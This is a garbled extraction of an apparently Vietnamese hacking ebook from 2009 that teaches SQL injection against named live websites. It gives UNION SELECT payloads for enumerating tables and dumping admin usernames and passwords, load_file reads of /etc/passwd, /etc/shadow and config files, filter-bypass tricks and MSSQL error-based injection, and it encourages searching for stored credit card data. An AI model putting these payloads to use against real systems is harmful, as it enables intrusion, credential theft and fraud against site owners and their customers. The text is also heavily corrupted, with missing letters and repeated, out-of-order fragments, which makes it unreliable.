It’s a special version which the title will be: Hieupc Returns Copyright ® by hieupc Email: hieupc@gmail.com Yahoo ID : hieuitpc Châm ngôn: ,  . , . : 09-09-2009 : Hieupc Page 1 - : , 4 ,  . tvi tính,  , ,  . L máy vi tính, ,  .   .  ngày hôm nay, ,  .  ,  Ebook này. , , ,  . P/S:    nó nhé. : hieupc@gmail.com. My Friends: Ly0kha, PxNam, J0hnnywalk3r, Yeuemdaikho, Kehieuhoc, Langtuhaohoa, Mr.saobang, Vampirevn, Thanhhuyleit, Thanhh83, Longnhi…………… Chú ý: Trong    là . Page 2 T – : Page I. Exploiting PHP Injection: 4 1. PHP Injection là gì? 4 2. . 4 - 16 II. Getting Root Server by Many Methods: 17 1. MYSQL Server. 17 - 24 2.  SA MSSQL Server. 25 - 37 3. ack. 38 - 48 III. How To Get These Important Information: 49 1. . 49 - 50 2. . 51 - 53 IV. Exploiting By Tool, Scripts: 54 1. Shell Scripts. 54 2. Tools Hack. 54 V. Speacial Things: 55 1. ng dn cách c phc khác. 55 - 64 2. . 65 - 68 3. Thc tp SQL Injection. 69 Page 3 – I. Exploiting PHP Injection: 1. PHP Injection là gì: PHP Injection xét vmà m th giá tr.   vào có th : $myvar = 'somevalue'; $x = $_GET['arg']; eval('$myvar = ' . $x . ';'); <?php $color = 'blue'; if (__isset( $_GET['COLOR'] ) ) $color = $_GET['COLOR']; require( $color . '.php' ); ?> 2. : SQL Injection lc khai thác da vào quá trình trao i d liu gii dùng và Web Application. Vic ng dng không kim tra các giá tr n attacker có th cho thc thi các SQL query không mong mun can thii, thêm, xem hay xóa các d liu. ng khai thác bng các gi các giá tr  server sinh các thông tin l t  tùy bin theo câu truy vn gc ci thit k. Nc customize các trang li hay các trang li không tr v, phi làm th nào? Hãy th khai thác vc: blind sql injection. Ví d: http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 Kt qu tr v là thông tin t. : ‘ . http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 ’ 1 . Page 4 – Tùy bin 1: http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=1 =>Trang web tr v database   Tùy bin 2: http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 and 1=2 => Không sn phm nào xut hin. Vy ta nhn thy  t qu tr v ca trang web khác nhau. Vi tùy biu kin 1=1 (true) s không làm n kt qu ca câu truy vn gc nên vn hi  tùy bin 2: 1=2 (false) thêm vào, câu truy vn gc s b tr kt qu v false dn không xut hin thông tin trên trang web. Dm này ta có th dùng các truy vn ni vào sao cho kt qu nh ly thông tin v h thng! Gi s chúng ta không bing và bng ca ng dng web này là gì? Vi li SQL Injection gây ra bi url trên ta xem th truy vn (SQL) ca nó liu có bao nhiu ng. S du này bi vì khi chúng ta dùng UNION trong câu lnh SQL thì s ng ca hai câu lnh select phi trùng nhau. nhanh . ng truy vn vi url: http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 Có rt nhi thc hin.  ình s dng order by <num>. Thc hin <num>. Khi thc hin order by <num>, nu trang web không hin th li tc là s ng vn còn, thc hin khi nào xut hin li tã thc hin tìm  s ng. : http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 1 ->  : Page 5 – http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 2 ->  . http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 10 -> , . 10 : http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 7 ->  http://www.hoanvustc.com/services.php?lg=vn&k=2&nc=1 order by 8 -> ,  sao, 7 8 . Suy ra: 7 mà chúng . y truy vn SQL vng (field)  u tra phiên bn SQL, User… vi lnh sau: : : - nhé : 4.5 5.0 mò table và column. http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= - 1%20union%20select%201,2,3,4,5,6,7 : : (, 3 4) m tra SQL Version xem sao: http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= -1%20union%20select%201,2,version(),4,5,6,7 Page 6 – : (5.0, _name hay column_.) Và c, : version() , user() , database() , @@datadir , group_concat(schema_name) , table_schema , … +from+information_schema.schemata http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= -1%20union%20select%201,2,user(),4,5,6,7 :   : concat_ws(0x3a,version(),user(),database()) http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= - 1%20union%20select%201,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7 : http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= - 1%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables : , , , . Page 7 –  thêm: unhex(hex( _concat nhé. : http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= - 1%20union%20select%201,2,unhex(hex(group_concat(table_name))),4,5,6,7%20from%20information_schema.t ables : Trong PHP Hex table  : admin, users, accounts….Hex vì Magic_Quotes : ON Sau khi, , : admin.  thác xem sao: (table: admin : 61646d696e) http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= - 1%20union%20select%201,2,unhex(hex(group_concat(column_name))),4,5,6,7%20from%20information_schem a.columns where table_name= 0x61646d696e " 0x” hex nhé. unhex(hex( ,   unhex(hex( . : : 2 : username, pass : admin : http://www.hoanvustc.com/services.php?lg=vn&k=2&nc= - 1%20union%20select%201,2,unhex(hex(group_concat(username,0x7c,pass))),4,5,6,7%20from%20admin Page 8 – : : Username: cuongle Pass: cuongle … . : 0x7c  | , . Khi là: admin .  , . : (: admin, pcadmin, admin_login, admin.php….) , : http://www.hoanvustc.com/manager/  xem sao. : () Page 9 - : Trong vic khai thác blind sql injection mt s hàm sau t ra hu ích: 1. SUBSTRING(string,v trí, s ng): Hàm ct chui vd: SUBSTRING('dbo', 1, 1) = ‘d’ SUBSTRING('dbo', 2, 1) = ‘b’ SUBSTRING('dbo', 3, 1) = ‘o’ 2. Lower(): chuyn ký t sang ch ng 3. Upper(): chuyn ký t sang ch HOA 4. ASCII(): chuyn ký t sang s ng mã ascii  Ngoài ra chú ý thêm: - : Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\ on line 37  - : Union select all, Union all select… - table_schema tables table_schema . http://www.website.com/shop.php?id=1+UNION+SELECT+ 1,group_concat(table_name),3,4 +from+information_schema.tables+where+table_schema=hie upc— ( nhé.) -  : CC, Information, user, pass…. (). -  : union, select, convert…. . : UnIoN SelECt… -  : credit card number,  ****,   unhide…( ). -  , : Page 10 [...]... char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,1 14, 1 18,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112) (chú ý: user = muu , muu = CHAR(109, 117, 117) ): union all select 1,2,3,load_file(char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81, 76,83,101,1 14, 118,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112)),5,6,7,8,9,10,11,... 1,2,substr(group_concat(table_name),100,300),3 ,4, 5… dành cho site.com/index.php?id=-1 union select 1,2, unhex(hex(substr(group_concat(table_name),100,300))),3 ,4, 5… 100 lên 200 300… tin LIMIT 1 OFFSET 44 có , 44 45 , 46 là tables : ‘ union select 1,2,3 ,4, 5,6,7,concat(table_name,0×7c,table_schema,0×7c),9,10,11,12,13, 14, 15,16,17,18,19 FROM information_schema.tables LIMIT 1 OFFSET 44 - Tu nhau, ví d : khác Microsoft... select 1,2,3 ,4, 5,6,7,database(),9,10,11,12,13, 14, 15,16,17,18,19— : ‘ union select 1,2,3 ,4, 5,6,7 ,version( ),9,10,11,12,13, 14, 15,16,17,18,19— : (SQL Version trên 5 nhé, ) ‘ union select 1,2,3 ,4, 5,6,7,user(),9,10,11,12,13, 14, 15,16,17,18,19— : ‘ union select 1,2,3 ,4, 5,6,7,@@datadir,9,10,11,12,13, 14, 15,16,17,18,19– Database : "/var/lib/mysql/ " Page 17 ta a MYSQL USER xem sao ( ): ‘ union select 1,2,3 ,4, 5,6,7,update_priv,9,10,11,12,13, 14, 15,16,17,18,19... 1,2,3 ,4, 5,6,7,update_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user– ‘ union select 1,2,3 ,4, 5,6,7,file_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user– ‘ union select 1,2,3 ,4, 5,6,7,select_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user– , , : sql là: muu ta sang Ascii là: CHAR(109, 117, 117) (muu : muu = 0x6d7575 ‘ union select 1,2,3 ,4, 5,6,7,select_priv,9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user... 1,2,3,load_file(char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81, 76,83,101,1 14, 118,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112)),5,6,7,8,9,10,11, 12,13, 14, 15,16,17,18,19,20,21,22,23, 24, 25,26,27,28,29,30,31 from mysql.user where user=CHAR(109, 117, 117) Page 20 : , , cái này lên google MySQL Query Browser ( Nhìn hìn , : ): : tblcart_payment , Drop,... Insert thông tin…………May m (Cpanel Root), : Page 21 Check xem Shop này có CC không nào ( ): , , : : Ngoài ra, load_file : /etc/passwd : ‘ union select 1,2,3 ,4, 5,6,7,load_file(CHAR (47 , 101, 116, 99, 47 , 112, 97, 115, 115, 119, 100)),9,10,11,12,13, 14, 15,16,17,18,19 from mysql.user where user=CHAR(109, 117, 117)– Page 22 (chú ý: etc/password và user= muu sang mã Ascii nhé): view : /etc/shadow , , crack... (current_date))) Page 24 2 SA MSSQL Server: VN 1 server ) Thông : GOV.VN ( ‘ hay : : http://www.hieupc.gov.vn/hieupc.asp?id=1/**/and/**/1=convert%28int,@@servername%2bchar(1 24) %2bdb_na me()%2bchar(1 24) %2bsystem_user%2bchar(1 24) %2b@ @version) sp_password : Ki m tra xem System_User hi n t i có quy n ngang = SA không: tên là 'SA ng System_user có quy n ngang = SA ng b qua b n ki m tra xem System_user không... char(97,100,109,105,110) : - M t chút v b ng mã ASCII: B kí t ASCII g m 256 kí t + 32 kí t u là các kí t 13) , ký t ESC ( mã 27) c phân b u khi n không + các mã 32 -47 ,58- 64, 91-96 và 123-127 là các kí t ch m ph y , d u ngo c , móc , h i c ví d c bi ENTER ( mã u ch m, + các mã 48 -57 là 10 ch s + các mã 65-90 là các ch cái hoa A->Z + các kí t 97-122 là các ch + các mã ASSCII là các kí t ng a->z h a b n các thông báo l i... mò table và column quan , scan tables hay columns 1,2,3 ,4, 5,6 : 1,1,1,1,1,1… Thay vì nh query SQL Injection - order by 1 thôi : http://vn.lge.com/index.php?option=products&task=productsdetails&id=1 order by 1 Order by 1 : , , : http://vn.lge.com/index.php?option=products&task=productsdetails&id=1%20union%20select%201,2,3 ,4, 5,6,7,8,9,10,11,12,13, 14 Page 12 : ‘sau - , , - L nh union c s d trong database...- MD5, có : http://www.th3-0utl4ws.com/tools/md5/md5_looker.php http://gdataonline.com/seekhash.php - , ch Bypass Login ( ) union+all+select… , + - : | : 0x7c : 2 sang Hex, ta vào trang web sau: http://www.string-functions.com/string-hex.aspx ( 0x -hex) : 61 646 d696e và sau khi thêm 0x : table: admin sau khi convert thì : 0x61 646 d696e, t convert sang Ascii thay vì convert sang . LIMIT 1 OFFSET 44  có  tin ,  44  45 , 46 là tables   .:. : char(67,58,92,80,1 14, 111,103,1 14, 97,109,70,105,108,101,115,92,77,121,83,81,76,92,77,121,83,81,76,83,101,1 14, 1 18,101,1 14, 53 ,46 ,48 ,92,68,97,116,97,92,99,111,110,102,105,103 ,46 ,112,1 04, 112)